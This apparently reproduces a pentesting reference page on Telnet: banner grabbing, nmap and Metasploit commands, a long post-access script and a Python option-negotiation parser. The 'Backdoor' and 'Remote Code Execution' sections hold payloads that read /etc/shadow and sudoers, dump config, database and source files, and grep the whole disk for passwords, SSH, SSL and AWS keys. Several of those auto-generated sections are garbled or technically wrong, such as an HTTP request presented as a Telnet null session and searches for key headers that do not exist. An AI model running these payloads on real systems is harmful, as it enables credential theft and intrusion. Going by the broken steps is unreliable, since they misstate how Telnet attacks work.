## Basic Information

Telnet is a network protocol that gives users an INsecure way to access a computer over a network.

**Default port:** 23

```
23/tcp open  telnet
```

## Enumeration

### Banner Grabbing

```bash
nc -vn <IP> 23
```

All the interesting enumeration can be performed by **nmap**:

```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```

The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions).

In the TELNET Protocol there are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. (From the [telnet RFC](https://tools.ietf.org/html/rfc854))\
**I know it is possible to enumerate these options but I don't know how, so let me know if you know how.**

### [Brute Force](../generic-methodologies-and-resources/brute-force.md#telnet)

## Config file

```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```

## HackTricks Automatic Commands

### Telnet

#### Banner Grabbing

##### Using Nmap

```bash
nmap -sV --script=banner -p <PORT> <IP>
```

##### Using Telnet

```bash
telnet <IP>
```

#### Authentication Bypass

##### Null Session

```bash
telnet <IP>
```

```bash
GET / HTTP/1.0
```

##### Backdoor

```bash
telnet <IP>
```

```bash
id;uname -a;w
echo "Distributor ID: ";cat /etc/*-release;echo ""
echo "Kernel: ";uname -a;echo ""
echo "Uptime: ";uptime;echo ""
echo "Processes: ";ps auxf --width 200;echo ""
echo "Logged In: ";who;echo ""
echo "Home Directories: ";ls -ahl /home;echo ""
echo "Private SSH Keys: ";find / -name 'id_rsa*' 2>/dev/null;echo ""
echo "Sudoers: ";cat /etc/sudoers 2>/dev/null;echo ""
echo "Cron Jobs: ";ls -ahl /etc/cron* 2>/dev/null;echo ""
echo "Listening Ports: ";netstat -antup 2>/dev/null;echo ""
echo "Established Connections: ";netstat -anp 2>/dev/null | grep ESTABLISHED;echo ""
echo "ARP Cache: ";arp -a;echo ""
echo "DNS Servers: ";cat /etc/resolv.conf;echo ""
echo "Routing Table: ";route;echo ""
echo "Firewall Rules: ";iptables -L;echo ""
echo "Hostname: ";hostname;echo ""
echo "Network Configuration: ";ifconfig -a;echo ""
echo "Available Interfaces: ";ls /sys/class/net;echo ""
echo "Default Route: ";ip route show;echo ""
echo "All Users: ";cat /etc/passwd;echo ""
echo "All Groups: ";cat /etc/group;echo ""
echo "All Shells: ";cat /etc/shells;echo ""
echo "All Services: ";ls /etc/init.d/;echo ""
echo "All Applications: ";ls /usr/share/applications/;echo ""
echo "All Binaries: ";ls /usr/bin/;echo ""
echo "All SUID Binaries: ";find / -perm -4000 -type f 2>/dev/null;echo ""
echo "All SGID Binaries: ";find / -perm -2000 -type f 2>/dev/null;echo ""
echo "All World Writable Directories: ";find / -perm -2 -type d 2>/dev/null;echo ""
echo "All World Writable Files: ";find / -perm -2 -type f 2>/dev/null;echo ""
echo "All Files with Sticky Bit: ";find / -perm -1000 -type d 2>/dev/null;echo ""
# lsattr prints the attribute flags first; the 'i' (immutable) flag is the fifth column
echo "All Files with Immutable Bit: ";lsattr -aR 2>/dev/null | grep '^----i';echo ""
echo "All Files with No Owner: ";find / -xdev \( -nouser -o -nogroup \) -print;echo ""
echo "All Files with No Permissions: ";find / -xdev \( -type f -o -type d \) ! -perm /o=rwx -print;echo ""
# parentheses are needed so that -type f and -exec apply to both -perm branches
echo "All Files with SUID/SGID and World Writable: ";find / \( -perm -4007 -o -perm -2007 \) -type f -exec ls -la {} \; 2>/dev/null;echo ""
echo "All Files with Hidden Attribute: ";find / -name ".*" -ls 2>/dev/null;echo ""
echo "All Files with Passwords: ";grep -Rl password / 2>/dev/null;echo ""
echo "All Files with Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with AWS Keys: ";grep -Rl "AKIA" / 2>/dev/null;echo ""
echo "All Files with Encryption Keys: ";grep -Rl "-----BEGIN ENCRYPTED PRIVATE KEY-----" / 2>/dev/null;echo ""
echo "All Files with SSH Keys: ";grep -Rl "BEGIN OPENSSH PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with SSL Certificates: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo ""
echo "All Files with SSL Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo ""
echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo ""
echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo ""
echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo ""
echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo ""
echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo ""
echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo ""
echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo ""
```

##### Remote Code Execution

```bash
telnet <IP>
```

One payload per line; the leading `;` is part of the payload. Globs are quoted so that `find` receives the pattern instead of the shell expanding it.

```bash
;id
;uname -a
;cat /etc/passwd
;cat /etc/shadow
;ls -ahl /home
;ls -ahl /root
;find / -name '*.bak' -type f -exec cat {} \;
;find / -name '*.log' -type f -exec cat {} \;
;find / -name '*.conf' -type f -exec cat {} \;
;find / -name '*.config' -type f -exec cat {} \;
;find / -name '*.db' -type f -exec cat {} \;
;find / -name '*.sql' -type f -exec cat {} \;
;find / -name '*.ini' -type f -exec cat {} \;
;find / -name '*.xml' -type f -exec cat {} \;
;find / -name '*.json' -type f -exec cat {} \;
;find / -name '*.yml' -type f -exec cat {} \;
;find / -name '*.yaml' -type f -exec cat {} \;
;find / -name '*.py' -type f -exec cat {} \;
;find / -name '*.php' -type f -exec cat {} \;
;find / -name '*.pl' -type f -exec cat {} \;
;find / -name '*.rb' -type f -exec cat {} \;
;find / -name '*.sh' -type f -exec cat {} \;
;find / -name '*.bash' -type f -exec cat {} \;
;find / -name '*.ps1' -type f -exec cat {} \;
;find / -name '*.psm1' -type f -exec cat {} \;
;find / -name '*.psd1' -type f -exec cat {} \;
;find / -name '*.psc1' -type f -exec cat {} \;
;find / -name '*.psc2' -type f -exec cat {} \;
;find / -name '*.pyc' -type f -exec cat {} \;
;find / -name '*.pyo' -type f -exec cat {} \;
;find / -name '*.class' -type f -exec cat {} \;
;find / -name '*.jar' -type f -exec cat {} \;
;find / -name '*.war' -type f -exec cat {} \;
;find / -name '*.ear' -type f -exec cat {} \;
;find / -name '*.jsp' -type f -exec cat {} \;
;find / -name '*.jspx' -type f -exec cat {} \;
;find / -name '*.swf' -type f -exec cat {} \;
;find / -name '*.fla' -type f -exec cat {} \;
;find / -name '*.as' -type f -exec cat {} \;
;find / -name '*.aspx' -type f -exec cat {} \;
;find / -name '*.ascx' -type f -exec cat {} \;
;find / -name '*.cs' -type f -exec cat {} \;
;find / -name '*.csproj' -type f -exec cat {} \;
;find / -name '*.vb' -type f -exec cat {} \;
;find / -name '*.vbproj' -type f -exec cat {} \;
;find / -name '*.java' -type f -exec cat {} \;
;find / -name '*.php3' -type f -exec cat {} \;
;find / -name '*.php4' -type f -exec cat {} \;
;find / -name '*.php5' -type f -exec cat {} \;
;find / -name '*.phtml' -type f -exec cat {} \;
;find / -name '*.inc' -type f -exec cat {} \;
;find / -name '*.pm' -type f -exec cat {} \;
;find / -name '*.cgi' -type f -exec cat {} \;
;find / -name '*.dll' -type f -exec cat {} \;
;find / -name '*.exe' -type f -exec cat {} \;
;find / -name '*.bat' -type f -exec cat {} \;
;find / -name '*.cmd' -type f -exec cat {} \;
;find / -name '*.vbs' -type f -exec cat {} \;
;find / -name '*.vbe' -type f -exec cat {} \;
;find / -name '*.js' -type f -exec cat {} \;
;find / -name '*.jse' -type f -exec cat {} \;
;find / -name '*.wsf' -type f -exec cat {} \;
;find / -name '*.wsc' -type f -exec cat {} \;
```

```
Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number: 23    #Comma separated if there is more than one.
Protocol_Description: Telnet    #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for t=Telnet
  Note: |
    wireshark to hear creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless mfs enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
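The "DO, DON'T, WILL, WON'T" negotiation described in the Enumeration section above is carried in-band as `IAC <verb> <option>` triplets, usually in the first bytes a server sends before its login prompt, so the options a server offers or requests can be read straight out of the banner that `nc -vn <IP> 23` already retrieves. The following Python is an added example, not code from the HackTricks page: it splits a raw Telnet stream into negotiation commands and banner text, names the options using the IANA-registered option codes, and builds the RFC 854 refusal replies (`DO` answered with `WONT`, `WILL` answered with `DONT`) that a passive client sends so the server does not keep waiting. The sample server bytes are constructed for the demonstration; `grab_and_parse` is the live variant and is not called by default.

```python
"""Telnet option negotiation (RFC 854/855) parser and passive responder.

Added example, not from the HackTricks page. Sample bytes are constructed.
"""
import socket

# Telnet command bytes (RFC 854)
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

# Subset of the IANA Telnet option registry
OPTION_NAMES = {
    0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS",
    24: "TERMINAL-TYPE", 31: "NAWS", 32: "TERMINAL-SPEED",
    33: "REMOTE-FLOW-CONTROL", 34: "LINEMODE", 36: "ENVIRON",
    37: "AUTHENTICATION", 38: "ENCRYPT", 39: "NEW-ENVIRON",
}
VERB_NAMES = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}


def parse_negotiation(data: bytes):
    """Split a raw Telnet byte stream into (negotiations, plain_text).

    negotiations: list of (verb, option) tuples in wire order.
    plain_text: the banner/prompt bytes with IAC sequences removed
    (an escaped IAC IAC becomes a single 0xFF data byte).
    Subnegotiations (IAC SB ... IAC SE) are skipped; a stream that ends
    in the middle of a command is treated as truncated, not as an error.
    """
    negotiations = []
    text = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= n:
            break                      # lone IAC at end of stream
        cmd = data[i + 1]
        if cmd == IAC:                 # escaped 0xFF data byte
            text.append(IAC)
            i += 2
        elif cmd in VERB_NAMES:
            if i + 2 >= n:
                break                  # truncated negotiation
            negotiations.append((cmd, data[i + 2]))
            i += 3
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end == -1:
                break                  # unterminated subnegotiation
            i = end + 2
        else:
            i += 2                     # other two-byte commands (NOP, GA, ...)
    return negotiations, bytes(text)


def summarize(negotiations):
    """Human-readable lines such as 'server WILL ECHO'."""
    return [f"server {VERB_NAMES[v]} {OPTION_NAMES.get(o, f'option-{o}')}"
            for v, o in negotiations]


def refusal_replies(negotiations):
    """Bytes that decline every offered/requested option (RFC 854).

    DONT and WONT from the server need no answer when we never enabled
    the option, so only DO and WILL produce a reply.
    """
    reply = bytearray()
    for verb, opt in negotiations:
        if verb == DO:
            reply += bytes([IAC, WONT, opt])
        elif verb == WILL:
            reply += bytes([IAC, DONT, opt])
    return bytes(reply)


# Constructed sample: server asks for TERMINAL-TYPE and NAWS, offers ECHO and
# SUPPRESS-GO-AHEAD, then sends a login banner.
SAMPLE_SERVER_BYTES = (
    bytes([IAC, DO, 24, IAC, DO, 31, IAC, WILL, 1, IAC, WILL, 3])
    + b"Welcome to demo host\r\nlogin: "
)


def grab_and_parse(host: str, port: int = 23, timeout: float = 5.0):
    """Live variant: read the server's opening bytes, parse, decline options."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        negs, text = parse_negotiation(s.recv(4096))
        s.sendall(refusal_replies(negs))
    return negs, text


if __name__ == "__main__":
    negs, banner = parse_negotiation(SAMPLE_SERVER_BYTES)
    for line in summarize(negs):
        print(line)
    print("banner:", banner.decode(errors="replace").strip())
    print("reply :", refusal_replies(negs).hex(" "))
```

A server that sends `WILL ECHO` together with `WILL SUPPRESS-GO-AHEAD` is asking for character-at-a-time mode, the usual setup when a login prompt follows; seeing `DO AUTHENTICATION` or `WILL ENCRYPT` (options 37 and 38) in this output is the only hint at connection time that the service may offer something other than cleartext credentials, which is exactly what the Wireshark filter `tcp.port == 23` in the notes above would otherwise capture.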